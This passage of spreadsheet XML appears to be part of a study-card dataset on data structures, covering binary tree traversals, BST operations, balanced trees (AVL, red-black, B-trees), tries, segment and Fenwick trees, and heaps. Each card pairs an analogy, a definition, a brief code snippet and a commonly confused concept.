          <t>Pre-order visits the node before its children (serialize, copy); post-order visits children first (free memory, evaluate expression trees).</t>
        </is>
      </c>
      <c r="F146" t="inlineStr">
        <is>
          <t>pre: visit(n); walk left; walk right / post: walk left; walk right; visit(n)</t>
        </is>
      </c>
      <c r="G146" t="inlineStr">
        <is>
          <t>In-order - only in-order splits the children around the node; pre and post keep the node at an edge, first or last.</t>
        </is>
      </c>
      <c r="H146" t="inlineStr">
        <is>
          <t>Table of contents (pre) vs index at the back (post).</t>
        </is>
      </c>
      <c r="J146" t="inlineStr">
        <is>
          <t>Data structures</t>
        </is>
      </c>
      <c r="K146" t="inlineStr">
        <is>
          <t>Binary trees &amp; BSTs</t>
        </is>
      </c>
    </row>
    <row r="147">
      <c r="A147" t="n">
        <v>0</v>
      </c>
      <c r="B147" t="inlineStr">
        <is>
          <t>145</t>
        </is>
      </c>
      <c r="C147" t="inlineStr">
        <is>
          <t>Level-order traversal</t>
        </is>
      </c>
      <c r="D147" t="inlineStr">
        <is>
          <t>Eating a wedding cake one tier at a time: the entire top tier is finished before anyone touches the next tier, plates queued left to right.</t>
        </is>
      </c>
      <c r="E147" t="inlineStr">
        <is>
          <t>Visit nodes level by level, left to right, driven by a queue: dequeue a node, visit it, enqueue its children - BFS on a tree.</t>
        </is>
      </c>
      <c r="F147" t="inlineStr">
        <is>
          <t>q = deque([root]) / while q: / n = q.popleft(); visit(n); q.extend(c for c in (n.left, n.right) if c)</t>
        </is>
      </c>
      <c r="G147" t="inlineStr">
        <is>
          <t>Depth-first traversals - DFS dives down using a stack or recursion; level-order sweeps across using a queue.</t>
        </is>
      </c>
      <c r="H147" t="inlineStr">
        <is>
          <t>Fire drill evacuating floor by floor.</t>
        </is>
      </c>
      <c r="J147" t="inlineStr">
        <is>
          <t>Data structures</t>
        </is>
      </c>
      <c r="K147" t="inlineStr">
        <is>
          <t>Binary trees &amp; BSTs</t>
        </is>
      </c>
    </row>
    <row r="148">
      <c r="A148" t="n">
        <v>0</v>
      </c>
      <c r="B148" t="inlineStr">
        <is>
          <t>146</t>
        </is>
      </c>
      <c r="C148" t="inlineStr">
        <is>
          <t>BST search/insert O(h)</t>
        </is>
      </c>
      <c r="D148" t="inlineStr">
        <is>
          <t>Twenty questions down the library forks: each librarian's 'higher or lower' answer eliminates an entire wing - and a new book walks the same forks until it finds an empty shelf to occupy.</t>
        </is>
      </c>
      <c r="E148" t="inlineStr">
        <is>
          <t>Compare with the node and branch left or right, discarding a subtree each step; cost is O(height) - log n balanced, n degenerate.</t>
        </is>
      </c>
      <c r="F148" t="inlineStr">
        <is>
          <t>while n: / n = n.left if key &lt; n.val else n.right / # insert: attach a node at the None you fell off</t>
        </is>
      </c>
      <c r="G148" t="inlineStr">
        <is>
          <t>Binary search on an array - the same halving idea, but arrays halve an index range; BSTs follow pointers and also insert cheaply.</t>
        </is>
      </c>
      <c r="H148" t="inlineStr">
        <is>
          <t>Plinko chip bouncing down pegs.</t>
        </is>
      </c>
      <c r="J148" t="inlineStr">
        <is>
          <t>Data structures</t>
        </is>
      </c>
      <c r="K148" t="inlineStr">
        <is>
          <t>Binary trees &amp; BSTs</t>
        </is>
      </c>
    </row>
    <row r="149">
      <c r="A149" t="n">
        <v>0</v>
      </c>
      <c r="B149" t="inlineStr">
        <is>
          <t>147</t>
        </is>
      </c>
      <c r="C149" t="inlineStr">
        <is>
          <t>BST deletion cases</t>
        </is>
      </c>
      <c r="D149" t="inlineStr">
        <is>
          <t>Removing a middle manager: no reports - clear the desk; one report - that report takes the chair; two reports - headhunt the successor (smallest of the right wing) into the chair, then fill their old vacancy.</t>
        </is>
      </c>
      <c r="E149" t="inlineStr">
        <is>
          <t>Leaf: unlink it; one child: splice that child up; two children: overwrite with the in-order successor, then delete the successor node.</t>
        </is>
      </c>
      <c r="F149" t="inlineStr">
        <is>
          <t># two-children case: / n.val = min_of(n.right) / delete(n.right, n.val)</t>
        </is>
      </c>
      <c r="G149" t="inlineStr">
        <is>
          <t>Heap extraction - a heap always removes the root and sifts down; BST delete removes arbitrary keys via three structural cases.</t>
        </is>
      </c>
      <c r="H149" t="inlineStr">
        <is>
          <t>Organ transplant waiting list.</t>
        </is>
      </c>
      <c r="J149" t="inlineStr">
        <is>
          <t>Data structures</t>
        </is>
      </c>
      <c r="K149" t="inlineStr">
        <is>
          <t>Binary trees &amp; BSTs</t>
        </is>
      </c>
    </row>
    <row r="150">
      <c r="A150" t="n">
        <v>0</v>
      </c>
      <c r="B150" t="inlineStr">
        <is>
          <t>148</t>
        </is>
      </c>
      <c r="C150" t="inlineStr">
        <is>
          <t>Degenerate tree</t>
        </is>
      </c>
      <c r="D150" t="inlineStr">
        <is>
          <t>A vine, not a tree: plant seeds in alphabetical order and every branch grows only rightward - a sad ivy strand dangling down the library wall, one librarian per rung.</t>
        </is>
      </c>
      <c r="E150" t="inlineStr">
        <is>
          <t>Inserting already-sorted keys chains every node down one side, collapsing the BST into a linked list with O(n) operations.</t>
        </is>
      </c>
      <c r="F150" t="inlineStr">
        <is>
          <t>for k in range(1, 8): insert(k) / # 1 -&gt; 2 -&gt; 3 -&gt; ... right-leaning chain, height n-1</t>
        </is>
      </c>
      <c r="G150" t="inlineStr">
        <is>
          <t>Balanced tree - the same keys with rotations keep height logarithmic; a degenerate tree's height equals n-1.</t>
        </is>
      </c>
      <c r="H150" t="inlineStr">
        <is>
          <t>Leaning tower built brick after brick on one edge.</t>
        </is>
      </c>
      <c r="J150" t="inlineStr">
        <is>
          <t>Data structures</t>
        </is>
      </c>
      <c r="K150" t="inlineStr">
        <is>
          <t>Binary trees &amp; BSTs</t>
        </is>
      </c>
    </row>
    <row r="151">
      <c r="A151" t="n">
        <v>0</v>
      </c>
      <c r="B151" t="inlineStr">
        <is>
          <t>149</t>
        </is>
      </c>
      <c r="C151" t="inlineStr">
        <is>
          <t>In-order successor</t>
        </is>
      </c>
      <c r="D151" t="inlineStr">
        <is>
          <t>Library succession law: the heir is the youngest reader of the elder wing - step right once, then run left to the very end. No right wing? Climb until you arrive at an ancestor from a left staircase.</t>
        </is>
      </c>
      <c r="E151" t="inlineStr">
        <is>
          <t>The next key in sorted order: the leftmost node of the right subtree if one exists, else the lowest ancestor entered from its left side.</t>
        </is>
      </c>
      <c r="F151" t="inlineStr">
        <is>
          <t>n = node.right / while n.left: n = n.left / return n</t>
        </is>
      </c>
      <c r="G151" t="inlineStr">
        <is>
          <t>Predecessor - the mirror image: rightmost of the left subtree; successor is leftmost of the right subtree.</t>
        </is>
      </c>
      <c r="H151" t="inlineStr">
        <is>
          <t>Next name in the phone book.</t>
        </is>
      </c>
      <c r="J151" t="inlineStr">
        <is>
          <t>Data structures</t>
        </is>
      </c>
      <c r="K151" t="inlineStr">
        <is>
          <t>Binary trees &amp; BSTs</t>
        </is>
      </c>
    </row>
    <row r="152">
      <c r="A152" t="n">
        <v>0</v>
      </c>
      <c r="B152" t="inlineStr">
        <is>
          <t>150</t>
        </is>
      </c>
      <c r="C152" t="inlineStr">
        <is>
          <t>Why balance trees</t>
        </is>
      </c>
      <c r="D152" t="inlineStr">
        <is>
          <t>A bonsai gardener who trims after every single planting: the tree stays squat and wide, any leaf a few snips from the trunk - never a dangling vine.</t>
        </is>
      </c>
      <c r="E152" t="inlineStr">
        <is>
          <t>Keeping height O(log n) via local restructuring guarantees logarithmic search, insert, and delete even under adversarial insertion orders.</t>
        </is>
      </c>
      <c r="F152" t="inlineStr">
        <is>
          <t>n = 1_000_000 keys / # balanced height ~ 20 / # degenerate height ~ 1_000_000</t>
        </is>
      </c>
      <c r="G152" t="inlineStr">
        <is>
          <t>Perfect balance - real self-balancing trees allow slack (AVL: sibling heights differ by at most 1); they never rebuild to perfection.</t>
        </is>
      </c>
      <c r="H152" t="inlineStr">
        <is>
          <t>Leveling a hanging mobile sculpture.</t>
        </is>
      </c>
      <c r="J152" t="inlineStr">
        <is>
          <t>Data structures</t>
        </is>
      </c>
      <c r="K152" t="inlineStr">
        <is>
          <t>Balanced &amp; specialized trees</t>
        </is>
      </c>
    </row>
    <row r="153">
      <c r="A153" t="n">
        <v>0</v>
      </c>
      <c r="B153" t="inlineStr">
        <is>
          <t>151</t>
        </is>
      </c>
      <c r="C153" t="inlineStr">
        <is>
          <t>AVL tree</t>
        </is>
      </c>
      <c r="D153" t="inlineStr">
        <is>
          <t>'A Very Level' tree: a gymnast on a balance beam who cartwheels (rotates) the instant one arm hangs two notches lower than the other.</t>
        </is>
      </c>
      <c r="E153" t="inlineStr">
        <is>
          <t>A BST storing subtree heights that rotates whenever siblings' heights differ by more than one - the strictest balance, fastest lookups.</t>
        </is>
      </c>
      <c r="F153" t="inlineStr">
        <is>
          <t>balance = h(left) - h(right) / if abs(balance) &gt; 1: rotate()</t>
        </is>
      </c>
      <c r="G153" t="inlineStr">
        <is>
          <t>Red-black tree - AVL rebalances more eagerly for faster reads; red-black tolerates ~2x height in exchange for cheaper writes.</t>
        </is>
      </c>
      <c r="H153" t="inlineStr">
        <is>
          <t>Scales of justice (rejected: scales balance weight, AVL balances height).</t>
        </is>
      </c>
      <c r="J153" t="inlineStr">
        <is>
          <t>Data structures</t>
        </is>
      </c>
      <c r="K153" t="inlineStr">
        <is>
          <t>Balanced &amp; specialized trees</t>
        </is>
      </c>
    </row>
    <row r="154">
      <c r="A154" t="n">
        <v>0</v>
      </c>
      <c r="B154" t="inlineStr">
        <is>
          <t>152</t>
        </is>
      </c>
      <c r="C154" t="inlineStr">
        <is>
          <t>Tree rotation</t>
        </is>
      </c>
      <c r="D154" t="inlineStr">
        <is>
          <t>A dance lift: the child swings up over the parent's head and lands on top, the parent dips underneath, and the child's inner subtree is handed off to the parent mid-spin - the line-dance order never changes.</t>
        </is>
      </c>
      <c r="E154" t="inlineStr">
        <is>
          <t>An O(1) local pointer rewiring that lifts a child above its parent while preserving in-order key order - the tool every balanced BST uses.</t>
        </is>
      </c>
      <c r="F154" t="inlineStr">
        <is>
          <t>def rotate_left(x): / y = x.right; x.right = y.left; y.left = x / return y # y is the new subtree root</t>
        </is>
      </c>
      <c r="G154" t="inlineStr">
        <is>
          <t>Subtree rebuild - a rotation is O(1) local rewiring; rebalancing by rebuilding costs time proportional to subtree size.</t>
        </is>
      </c>
      <c r="H154" t="inlineStr">
        <is>
          <t>Meshing gears turning (rejected: gears rotate in place, no promotion).</t>
        </is>
      </c>
      <c r="J154" t="inlineStr">
        <is>
          <t>Data structures</t>
        </is>
      </c>
      <c r="K154" t="inlineStr">
        <is>
          <t>Balanced &amp; specialized trees</t>
        </is>
      </c>
    </row>
    <row r="155">
      <c r="A155" t="n">
        <v>0</v>
      </c>
      <c r="B155" t="inlineStr">
        <is>
          <t>153</t>
        </is>
      </c>
      <c r="C155" t="inlineStr">
        <is>
          <t>Red-black tree</t>
        </is>
      </c>
      <c r="D155" t="inlineStr">
        <is>
          <t>A kingdom's roads: every route from castle to any border post passes the SAME number of black-uniformed guards, and no two red-scarfed rookies ever stand back to back - so no road can grow too long.</t>
        </is>
      </c>
      <c r="E155" t="inlineStr">
        <is>
          <t>A BST coloring nodes red or black under rules (no red parent with red child; equal black count on every root-leaf path) capping height at ~2 log n.</t>
        </is>
      </c>
      <c r="F155" t="inlineStr">
        <is>
          <t># std::map, Java TreeMap, Linux CFS scheduler / # insert: recolor, and rotate only when rules break</t>
        </is>
      </c>
      <c r="G155" t="inlineStr">
        <is>
          <t>AVL tree - red-black is looser (height up to 2 log n) but rotates less, so libraries default to it for mixed read-write loads.</t>
        </is>
      </c>
      <c r="H155" t="inlineStr">
        <is>
          <t>Checkerboard path counting.</t>
        </is>
      </c>
      <c r="J155" t="inlineStr">
        <is>
          <t>Data structures</t>
        </is>
      </c>
      <c r="K155" t="inlineStr">
        <is>
          <t>Balanced &amp; specialized trees</t>
        </is>
      </c>
    </row>
    <row r="156">
      <c r="A156" t="n">
        <v>0</v>
      </c>
      <c r="B156" t="inlineStr">
        <is>
          <t>154</t>
        </is>
      </c>
      <c r="C156" t="inlineStr">
        <is>
          <t>B-tree</t>
        </is>
      </c>
      <c r="D156" t="inlineStr">
        <is>
          <t>A filing cabinet where each drawer is a whole sorted shelf of 500 dividers: three drawer-pulls take you from the entire archive to one file - pulls (disk seeks) are expensive, so drawers are fat.</t>
        </is>
      </c>
      <c r="E156" t="inlineStr">
        <is>
          <t>A shallow, wide search tree whose nodes hold many sorted keys, sized to disk pages so each tree level costs exactly one disk read.</t>
        </is>
      </c>
      <c r="F156" t="inlineStr">
        <is>
          <t># one node = one 4KB page, ~100-1000 keys / # height 3-4 spans billions of records</t>
        </is>
      </c>
      <c r="G156" t="inlineStr">
        <is>
          <t>Binary tree - a B-tree fans out to hundreds of children to minimize disk reads; binary trees fan out to two, fine in RAM.</t>
        </is>
      </c>
      <c r="H156" t="inlineStr">
        <is>
          <t>Phone book with fat thumb tabs.</t>
        </is>
      </c>
      <c r="J156" t="inlineStr">
        <is>
          <t>Data structures</t>
        </is>
      </c>
      <c r="K156" t="inlineStr">
        <is>
          <t>Balanced &amp; specialized trees</t>
        </is>
      </c>
    </row>
    <row r="157">
      <c r="A157" t="n">
        <v>0</v>
      </c>
      <c r="B157" t="inlineStr">
        <is>
          <t>155</t>
        </is>
      </c>
      <c r="C157" t="inlineStr">
        <is>
          <t>B+ tree</t>
        </is>
      </c>
      <c r="D157" t="inlineStr">
        <is>
          <t>The cabinet's upper drawers hold only signposts; every actual file lives in the bottom drawer row, and those bottom drawers are chained left to right - slide sideways to read A through Z without ever climbing back up.</t>
        </is>
      </c>
      <c r="E157" t="inlineStr">
        <is>
          <t>A B-tree variant keeping all records in linked leaves, with internal nodes as pure routing keys - range scans just walk the leaf chain.</t>
        </is>
      </c>
      <c r="F157" t="inlineStr">
        <is>
          <t># leaves: [k1,k2] -&gt; [k3,k4] -&gt; [k5,k6], linked / SELECT ... WHERE k BETWEEN 10 AND 99 # one descent + leaf walk</t>
        </is>
      </c>
      <c r="G157" t="inlineStr">
        <is>
          <t>B-tree - a plain B-tree stores records in internal nodes too; B+ pushes all data to linked leaves, making range queries sequential.</t>
        </is>
      </c>
      <c r="H157" t="inlineStr">
        <is>
          <t>Hotel lobby directory pointing to rooms.</t>
        </is>
      </c>
      <c r="J157" t="inlineStr">
        <is>
          <t>Data structures</t>
        </is>
      </c>
      <c r="K157" t="inlineStr">
        <is>
          <t>Balanced &amp; specialized trees</t>
        </is>
      </c>
    </row>
    <row r="158">
      <c r="A158" t="n">
        <v>0</v>
      </c>
      <c r="B158" t="inlineStr">
        <is>
          <t>156</t>
        </is>
      </c>
      <c r="C158" t="inlineStr">
        <is>
          <t>Trie (prefix tree)</t>
        </is>
      </c>
      <c r="D158" t="inlineStr">
        <is>
          <t>A choose-your-own-adventure spelling: from the lobby take hallway 'c', then 'a', then 't' - the room lights up 'word!' and corridors continue toward 'cats' and 'catalog'. Say 'trie' as in reTRIEval.</t>
        </is>
      </c>
      <c r="E158" t="inlineStr">
        <is>
          <t>A tree keyed by characters: each root-to-node path spells a prefix, so lookup and autocomplete cost O(word length), not O(word count).</t>
        </is>
      </c>
      <c r="F158" t="inlineStr">
        <is>
          <t>node = root / for ch in 'cat': node = node.children[ch] / node.is_word = True</t>
        </is>
      </c>
      <c r="G158" t="inlineStr">
        <is>
          <t>Hash set of strings - a set answers exact membership only; a trie also answers prefix queries and powers autocomplete.</t>
        </is>
      </c>
      <c r="H158" t="inlineStr">
        <is>
          <t>Family tree of syllables.</t>
        </is>
      </c>
      <c r="J158" t="inlineStr">
        <is>
          <t>Data structures</t>
        </is>
      </c>
      <c r="K158" t="inlineStr">
        <is>
          <t>Balanced &amp; specialized trees</t>
        </is>
      </c>
    </row>
    <row r="159">
      <c r="A159" t="n">
        <v>0</v>
      </c>
      <c r="B159" t="inlineStr">
        <is>
          <t>157</t>
        </is>
      </c>
      <c r="C159" t="inlineStr">
        <is>
          <t>Segment tree</t>
        </is>
      </c>
      <c r="D159" t="inlineStr">
        <is>
          <t>A tournament pyramid of accountants: each accountant knows the total of exactly their half of the row below - ask 'sum of days 3 to 9' and a few mid-level accountants stitch the answer from pre-added chunks.</t>
        </is>
      </c>
      <c r="E159" t="inlineStr">
        <is>
          <t>A binary tree over array intervals storing an aggregate (sum, min, max) per segment; range query and point update both run in O(log n).</t>
        </is>
      </c>
      <c r="F159" t="inlineStr">
        <is>
          <t>tree[v] = tree[2*v] + tree[2*v+1] / query(3, 9) # combines O(log n) stored segments</t>
        </is>
      </c>
      <c r="G159" t="inlineStr">
        <is>
          <t>Fenwick tree - Fenwick is a leaner array trick limited to invertible prefix ops; segment trees handle arbitrary ranges, min/max, lazy updates.</t>
        </is>
      </c>
      <c r="H159" t="inlineStr">
        <is>
          <t>Map zoom levels pre-rendering tiles.</t>
        </is>
      </c>
      <c r="J159" t="inlineStr">
        <is>
          <t>Data structures</t>
        </is>
      </c>
      <c r="K159" t="inlineStr">
        <is>
          <t>Balanced &amp; specialized trees</t>
        </is>
      </c>
    </row>
    <row r="160">
      <c r="A160" t="n">
        <v>0</v>
      </c>
      <c r="B160" t="inlineStr">
        <is>
          <t>158</t>
        </is>
      </c>
      <c r="C160" t="inlineStr">
        <is>
          <t>Fenwick tree (BIT)</t>
        </is>
      </c>
      <c r="D160" t="inlineStr">
        <is>
          <t>A cash drawer with Russian-doll compartments sized 1, 2, 4, 8: to total the first 13 dollars you open compartments 8 + 4 + 1 - the binary digits of 13 tell you exactly which lids to lift.</t>
        </is>
      </c>
      <c r="E160" t="inlineStr">
        <is>
          <t>An array where index i stores the sum of a block sized by i's lowest set bit; prefix sums and point updates both run in O(log n).</t>
        </is>
      </c>
      <c r="F160" t="inlineStr">
        <is>
          <t>while i &gt; 0: s += bit[i]; i -= i &amp; (-i) # prefix sum / # update: while i &lt;= n: bit[i] += d; i += i &amp; (-i)</t>
        </is>
      </c>
      <c r="G160" t="inlineStr">
        <is>
          <t>Segment tree - a Fenwick tree uses half the memory and far less code but only supports invertible prefix aggregates like sums.</t>
        </is>
      </c>
      <c r="H160" t="inlineStr">
        <is>
          <t>Binary odometer wheels.</t>
        </is>
      </c>
      <c r="J160" t="inlineStr">
        <is>
          <t>Data structures</t>
        </is>
      </c>
      <c r="K160" t="inlineStr">
        <is>
          <t>Balanced &amp; specialized trees</t>
        </is>
      </c>
    </row>
    <row r="161">
      <c r="A161" t="n">
        <v>0</v>
      </c>
      <c r="B161" t="inlineStr">
        <is>
          <t>159</t>
        </is>
      </c>
      <c r="C161" t="inlineStr">
        <is>
          <t>Splay tree</t>
        </is>
      </c>
      <c r="D161" t="inlineStr">
        <is>
          <t>A needy cat: whatever toy you touched last claws its way to the summit of the cat tree and SPLAYS across the top - reach for it again and it is right there.</t>
        </is>
      </c>
      <c r="E161" t="inlineStr">
        <is>
          <t>A BST that rotates every accessed node up to the root, so hot keys drift to the top; amortized O(log n) with zero stored metadata.</t>
        </is>
      </c>
      <c r="F161" t="inlineStr">
        <is>
          <t>get(x) # x is rotated all the way to root / get(x) # now near-instant, it sits on top</t>
        </is>
      </c>
      <c r="G161" t="inlineStr">
        <is>
          <t>LRU cache - both favor recent items, but an LRU evicts old entries; a splay tree keeps everything, merely reshuffled.</t>
        </is>
      </c>
      <c r="H161" t="inlineStr">
        <is>
          <t>Squeaky wheel getting the grease.</t>
        </is>
      </c>
      <c r="J161" t="inlineStr">
        <is>
          <t>Data structures</t>
        </is>
      </c>
      <c r="K161" t="inlineStr">
        <is>
          <t>Balanced &amp; specialized trees</t>
        </is>
      </c>
    </row>
    <row r="162">
      <c r="A162" t="n">
        <v>0</v>
      </c>
      <c r="B162" t="inlineStr">
        <is>
          <t>160</t>
        </is>
      </c>
      <c r="C162" t="inlineStr">
        <is>
          <t>Binary heap property</t>
        </is>
      </c>
      <c r="D162" t="inlineStr">
        <is>
          <t>A dessert pyramid where lighter layers always float above heavier ones: the single feather-light dollop of cream crowns the very peak.</t>
        </is>
      </c>
      <c r="E162" t="inlineStr">
        <is>
          <t>A complete binary tree where every parent outranks its children (min-heap: parent &lt;= children), so the extreme element is always the root.</t>
        </is>
      </c>
      <c r="F162" t="inlineStr">
        <is>
          <t>import heapq / heapq.heappush(h, 5) / h[0] # the minimum, always at the root</t>
        </is>
      </c>
      <c r="G162" t="inlineStr">
        <is>
          <t>BST - a heap orders only along parent-child edges (siblings unordered); a BST orders whole left and right subtrees.</t>
        </is>
      </c>
      <c r="H162" t="inlineStr">
        <is>
          <t>Stacked hot-air balloons.</t>
        </is>
      </c>
      <c r="J162" t="inlineStr">
        <is>
          <t>Data structures</t>
        </is>
      </c>
      <c r="K162" t="inlineStr">
        <is>
          <t>Heaps &amp; priority queues</t>
        </is>
      </c>
    </row>
    <row r="163">
      <c r="A163" t="n">
        <v>0</v>
      </c>
      <c r="B163" t="inlineStr">
        <is>
          <t>161</t>
        </is>
      </c>
      <c r="C163" t="inlineStr">
        <is>
          <t>Min-heap vs max-heap</t>
        </is>
      </c>
      <c r="D163" t="inlineStr">
        <is>
          <t>Twin carnival claw machines: one claw always grabs the cheapest prize on top (min), its mirror twin the priciest (max). Python only sells the cheap-claw, so you tape minus signs onto price tags to fake the other.</t>
        </is>
      </c>
      <c r="E163" t="inlineStr">
        <is>
          <t>A min-heap keeps the smallest at the root, a max-heap the largest - same mechanics, flipped comparison; Python's heapq is min-only.</t>
        </is>
      </c>
      <c r="F163" t="inlineStr">
        <is>
          <t>heapq.heappush(h, x) # min-heap / heapq.heappush(h, -x); top = -h[0] # max via negation</t>
        </is>
      </c>
      <c r="G163" t="inlineStr">
        <is>
          <t>heapq direction bug - Python heapq is a min-heap; assuming max-heap behavior is the classic off-by-sign mistake.</t>
        </is>
      </c>
      <c r="H163" t="inlineStr">
        <is>
          <t>Limbo champion vs high-jump champion.</t>
        </is>
      </c>
      <c r="J163" t="inlineStr">
        <is>
          <t>Data structures</t>
        </is>
      </c>
      <c r="K163" t="inlineStr">
        <is>
          <t>Heaps &amp; priority queues</t>
        </is>
      </c>
    </row>
    <row r="164">
      <c r="A164" t="n">
        <v>0</v>
      </c>
      <c r="B164" t="inlineStr">
        <is>
          <t>162</t>
        </is>
      </c>
      <c r="C164" t="inlineStr">
        <is>
          <t>Complete tree as array</t>
        </is>
      </c>
      <c r="D164" t="inlineStr">
        <is>
          <t>A theater seating chart for a family reunion: grandma in seat 0, her two kids in seats 1 and 2, their kids in 3 through 6 - nobody holds hands (pointers); seat numbers do all the math.</t>
        </is>
      </c>
      <c r="E164" t="inlineStr">
        <is>
          <t>Because the tree is complete, it packs into an array with zero pointers: children of i sit at 2i+1 and 2i+2, parent at (i-1)//2.</t>
        </is>
      </c>
      <c r="F164" t="inlineStr">
        <is>
          <t>left, right = 2*i + 1, 2*i + 2 / parent = (i - 1) // 2</t>
        </is>
      </c>
      <c r="G164" t="inlineStr">
        <is>
          <t>Pointer-based tree - heaps exploit completeness (no gaps) to use index math; a general tree has holes and needs real pointers.</t>
        </is>
      </c>
      <c r="H164" t="inlineStr">
        <is>
          <t>Pascal's triangle numbering.</t>
        </is>
      </c>
      <c r="J164" t="inlineStr">
        <is>
          <t>Data structures</t>
        </is>
      </c>
      <c r="K164" t="inlineStr">
        <is>
          <t>Heaps &amp; priority queues</t>
        </is>
      </c>
    </row>
    <row r="165">
      <c r="A165" t="n">
        <v>0</v>
      </c>
      <c r="B165" t="inlineStr">
        <is>
          <t>163</t>
        </is>
      </c>
      <c r="C165" t="inlineStr">
        <is>
          <t>Sift up (insert)</t>
        </is>
      </c>
      <c r="D165" t="inlineStr">
        <is>
          <t>A bubble released at the pool floor: it rises past heavier water one level at a time and stops the moment the layer above is lighter than it is.</t>
        </is>
      </c>
      <c r="E165" t="inlineStr">
        <is>
          <t>Append the new item in the next leaf slot at the array's end, then swap it with its parent while it outranks the parent - O(log n).</t>
        </is>
      </c>
      <c r="F165" t="inlineStr">
        <is>
          <t>h.append(x); i = len(h) - 1 / while i and h[i] &lt; h[(i-1)//2]: / swap(i, (i-1)//2); i = (i-1)//2</t>
        </is>
      </c>
      <c r="G165" t="inlineStr">
        <is>
          <t>Sift down - sift up repairs a violation at the bottom after insert; sift down repairs the top after extraction.</t>
        </is>
      </c>
      <c r="H165" t="inlineStr">
        <is>
          <t>Champagne bubble in a flute.</t>
        </is>
      </c>
      <c r="J165" t="inlineStr">
        <is>
          <t>Data structures</t>
        </is>
      </c>
      <c r="K165" t="inlineStr">
        <is>
          <t>Heaps &amp; priority queues</t>
        </is>
      </c>
    </row>
    <row r="166">
      <c r="A166" t="n">
        <v>0</v>
      </c>
      <c r="B166" t="inlineStr">
        <is>
          <t>164</t>
        </is>
      </c>
      <c r="C166" t="inlineStr">
        <is>
          <t>Sift down (extract-min)</t>
        </is>
      </c>
      <c r="D166" t="inlineStr">
        <is>
          <t>The CEO retires and the newest intern is dropped into the corner office: too junior for the chair, she sinks level by level, always trading places with the stronger deputy, until she rests where she belongs.</t>
        </is>
      </c>
      <c r="E166" t="inlineStr">
        <is>
          <t>Remove the root, drop the last leaf into the hole, then swap it with its better child until both children rank below it.</t>
        </is>
      </c>
      <c r="F166" t="inlineStr">
        <is>
          <t>top = h[0] / h[0] = h.pop() / sift_down(0) # swap with smaller child until settled</t>
        </is>
      </c>
      <c r="G166" t="inlineStr">
        <is>
          <t>Sift up - extraction always starts the repair at the root moving down; insertion starts at a leaf moving up.</t>
        </is>
      </c>
      <c r="H166" t="inlineStr">
        <is>
          <t>Stone sinking through layered mud.</t>
        </is>
      </c>
      <c r="J166" t="inlineStr">
        <is>
          <t>Data structures</t>
        </is>
      </c>
      <c r="K166" t="inlineStr">
        <is>
          <t>Heaps &amp; priority queues</t>
        </is>
      </c>
    </row>
    <row r="167">
      <c r="A167" t="n">
        <v>0</v>
      </c>
      <c r="B167" t="inlineStr">
        <is>
          <t>165</t>
        </is>
      </c>
      <c r="C167" t="inlineStr">
        <is>
          <t>Build-heap in O(n)</t>
        </is>
      </c>
      <c r="D167" t="inlineStr">
        <is>
          <t>Renovating the corporate pyramid from the mezzanine down to the lobby: most managers sit near the bottom with almost nowhere to sink, so the whole reshuffle is cheap - only the rare top boss takes a long fall.</t>
        </is>
      </c>
      <c r="E167" t="inlineStr">
        <is>
          <t>Heapify any array by sifting down each internal node from the middle backward; total work sums to O(n), not O(n log n).</t>
        </is>
      </c>
      <c r="F167" t="inlineStr">
        <is>
          <t>for i in range(n//2 - 1, -1, -1): / sift_down(i) / heapq.heapify(lst) # O(n)</t>
        </is>
      </c>
      <c r="G167" t="inlineStr">
        <is>
          <t>n pushes - inserting one by one costs O(n log n); bottom-up heapify is O(n) because most nodes sift only short distances.</t>
        </is>
      </c>
      <c r="H167" t="inlineStr">
        <is>
          <t>Sandcastle settling under its own weight.</t>
        </is>
      </c>
      <c r="J167" t="inlineStr">
        <is>
          <t>Data structures</t>
        </is>
      </c>
      <c r="K167" t="inlineStr">
        <is>
          <t>Heaps &amp; priority queues</t>
        </is>
      </c>
    </row>
    <row r="168">
      <c r="A168" t="n">
        <v>0</v>
      </c>
      <c r="B168" t="inlineStr">
        <is>
          <t>166</t>
        </is>
      </c>
      <c r="C168" t="inlineStr">
        <is>
          <t>Priority queue ADT</t>
        </is>
      </c>
      <c r="D168" t="inlineStr">
        <is>
          <t>An ER waiting room: the gunshot wound admitted a minute ago leaps past the sprained ankle that has waited two hours - triage tags, not take-a-number tickets, decide who is next.</t>
        </is>
      </c>
      <c r="E168" t="inlineStr">
        <is>
          <t>An abstract queue that always serves the highest-priority item next regardless of arrival order; binary heaps are the standard engine.</t>
        </is>
      </c>
      <c r="F168" t="inlineStr">
        <is>
          <t>heapq.heappush(pq, (priority, task)) / prio, task = heapq.heappop(pq)</t>
        </is>
      </c>
      <c r="G168" t="inlineStr">
        <is>
          <t>FIFO queue - a plain queue serves by arrival time; a priority queue serves by rank (and PQ is the interface, heap the implementation).</t>
        </is>
      </c>
      <c r="H168" t="inlineStr">
        <is>
          <t>Airport boarding groups.</t>
        </is>
      </c>
      <c r="J168" t="inlineStr">
        <is>
          <t>Data structures</t>
        </is>
      </c>
      <c r="K168" t="inlineStr">
        <is>
          <t>Heaps &amp; priority queues</t>
        </is>
      </c>
    </row>
    <row r="169">
      <c r="A169" t="n">
        <v>0</v>
      </c>
      <c r="B169" t="inlineStr">
        <is>
          <t>167</t>
        </is>
      </c>
      <c r="C169" t="inlineStr">
        <is>
          <t>Top-k via size-k heap</t>
        </is>
      </c>
      <c r="D169" t="inlineStr">
        <is>
          <t>A ten-champion hall of fame where the doorman is the WEAKEST champion: every challenger fights only the doorman - win, and you take his plaque while the new weakest walks to the door.</t>
        </is>
      </c>
      <c r="E169" t="inlineStr">
        <is>
          <t>Keep a min-heap of the k best seen: a newcomer beating the heap's root replaces it - O(n log k) time, O(k) space, stream-friendly.</t>
        </is>
      </c>
      <c r="F169" t="inlineStr">
        <is>
          <t>for x in stream: / if len(h) &lt; k: heapq.heappush(h, x) / elif x &gt; h[0]: heapq.heapreplace(h, x)</t>
        </is>
      </c>
      <c r="G169" t="inlineStr">
        <is>
          <t>Full sort - sorting costs O(n log n) and needs all data in memory; note the twist: top-k LARGEST uses a MIN-heap as gatekeeper.</t>
        </is>
      </c>
      <c r="H169" t="inlineStr">
        <is>
          <t>Ten trophies on a shelf, smallest nearest the trash.</t>
        </is>
      </c>
      <c r="J169" t="inlineStr">
        <is>
          <t>Data structures</t>
        </is>
      </c>
      <c r="K169" t="inlineStr">
        <is>
          <t>Heaps &amp; priority queues</t>
        </is>
      </c>
    </row>
    <row r="170">
      <c r="A170" t="n">
        <v>0</v>
      </c>
      <c r="B170" t="inlineStr">
        <is>
          <t>168</t>
        </is>
      </c>
      <c r="C170" t="inlineStr">
        <is>
